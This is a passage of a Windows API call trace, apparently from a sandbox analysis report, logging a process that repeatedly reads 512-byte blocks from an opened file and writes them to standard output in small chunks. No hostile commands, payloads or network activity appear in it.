dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0136.838] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 4 [0136.838] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.838] GetFileType (hFile=0x58) returned 0x1 [0136.838] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.838] GetFileSize (in: hFile=0x58, lpFileSizeHigh=0x2adfcc | out: lpFileSizeHigh=0x2adfcc*=0x0) returned 0x7d600 [0136.838] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.838] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.838] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.838] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.839] GetFileType (hFile=0x50) returned 0x1 [0136.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.839] GetFileType (hFile=0x50) returned 0x1 [0136.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.839] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.841] GetFileType (hFile=0x50) returned 0x1 [0136.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.841] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.841] GetFileType (hFile=0x50) returned 0x1 [0136.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.841] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.841] GetFileType (hFile=0x50) returned 0x1 [0136.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.841] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.841] GetFileType (hFile=0x50) returned 0x1 [0136.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.841] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.842] GetFileType (hFile=0x50) returned 0x1 [0136.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.842] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.842] GetFileType (hFile=0x50) returned 0x1 [0136.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.842] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.842] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.842] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.842] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.842] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.842] GetFileType (hFile=0x50) returned 0x1 [0136.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.842] GetFileType (hFile=0x50) returned 0x1 [0136.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.842] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.842] GetFileType (hFile=0x50) returned 0x1 [0136.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.842] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.843] GetFileType (hFile=0x50) returned 0x1 [0136.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.843] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.843] GetFileType (hFile=0x50) returned 0x1 [0136.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.843] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.843] GetFileType (hFile=0x50) returned 0x1 [0136.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.843] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.843] GetFileType (hFile=0x50) returned 0x1 [0136.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.843] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.843] GetFileType (hFile=0x50) returned 0x1 [0136.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.844] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.844] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.844] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.844] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.844] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.844] GetFileType (hFile=0x50) returned 0x1 [0136.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.844] GetFileType (hFile=0x50) returned 0x1 [0136.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.845] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.845] GetFileType (hFile=0x50) returned 0x1 [0136.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.845] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.845] GetFileType (hFile=0x50) returned 0x1 [0136.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.845] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.845] GetFileType (hFile=0x50) returned 0x1 [0136.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.845] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.845] GetFileType (hFile=0x50) returned 0x1 [0136.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.845] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.845] GetFileType (hFile=0x50) returned 0x1 [0136.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.845] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.846] GetFileType (hFile=0x50) returned 0x1 [0136.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.846] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.846] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.846] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.846] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.846] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.846] GetFileType (hFile=0x50) returned 0x1 [0136.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.846] GetFileType (hFile=0x50) returned 0x1 [0136.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.846] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.846] GetFileType (hFile=0x50) returned 0x1 [0136.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.846] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.846] GetFileType (hFile=0x50) returned 0x1 [0136.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.846] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.847] GetFileType (hFile=0x50) returned 0x1 [0136.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.847] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.847] GetFileType (hFile=0x50) returned 0x1 [0136.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.847] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.847] GetFileType (hFile=0x50) returned 0x1 [0136.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.847] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.847] GetFileType (hFile=0x50) returned 0x1 [0136.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.847] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.847] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.847] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.847] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.847] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.847] GetFileType (hFile=0x50) returned 0x1 [0136.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.847] GetFileType (hFile=0x50) returned 0x1 [0136.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.848] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.848] GetFileType (hFile=0x50) returned 0x1 [0136.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.848] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.848] GetFileType (hFile=0x50) returned 0x1 [0136.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.848] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.848] GetFileType (hFile=0x50) returned 0x1 [0136.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.848] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.848] GetFileType (hFile=0x50) returned 0x1 [0136.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.848] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.848] GetFileType (hFile=0x50) returned 0x1 [0136.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.848] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.849] GetFileType (hFile=0x50) returned 0x1 [0136.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.849] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.849] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.849] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.849] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.849] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.849] GetFileType (hFile=0x50) returned 0x1 [0136.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.849] GetFileType (hFile=0x50) returned 0x1 [0136.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.849] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.849] GetFileType (hFile=0x50) returned 0x1 [0136.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.849] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.849] GetFileType (hFile=0x50) returned 0x1 [0136.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.849] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.850] GetFileType (hFile=0x50) returned 0x1 [0136.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.850] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.850] GetFileType (hFile=0x50) returned 0x1 [0136.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.850] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.850] GetFileType (hFile=0x50) returned 0x1 [0136.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.850] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.850] GetFileType (hFile=0x50) returned 0x1 [0136.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.850] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.850] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.850] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.850] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.850] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.850] GetFileType (hFile=0x50) returned 0x1 [0136.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.850] GetFileType (hFile=0x50) returned 0x1 [0136.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.851] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.851] GetFileType (hFile=0x50) returned 0x1 [0136.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.851] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.851] GetFileType (hFile=0x50) returned 0x1 [0136.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.851] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.851] GetFileType (hFile=0x50) returned 0x1 [0136.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.851] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.851] GetFileType (hFile=0x50) returned 0x1 [0136.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.851] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.851] GetFileType (hFile=0x50) returned 0x1 [0136.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.851] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.852] GetFileType (hFile=0x50) returned 0x1 [0136.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.852] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.852] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.852] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.852] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.852] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.852] GetFileType (hFile=0x50) returned 0x1 [0136.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.852] GetFileType (hFile=0x50) returned 0x1 [0136.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.852] 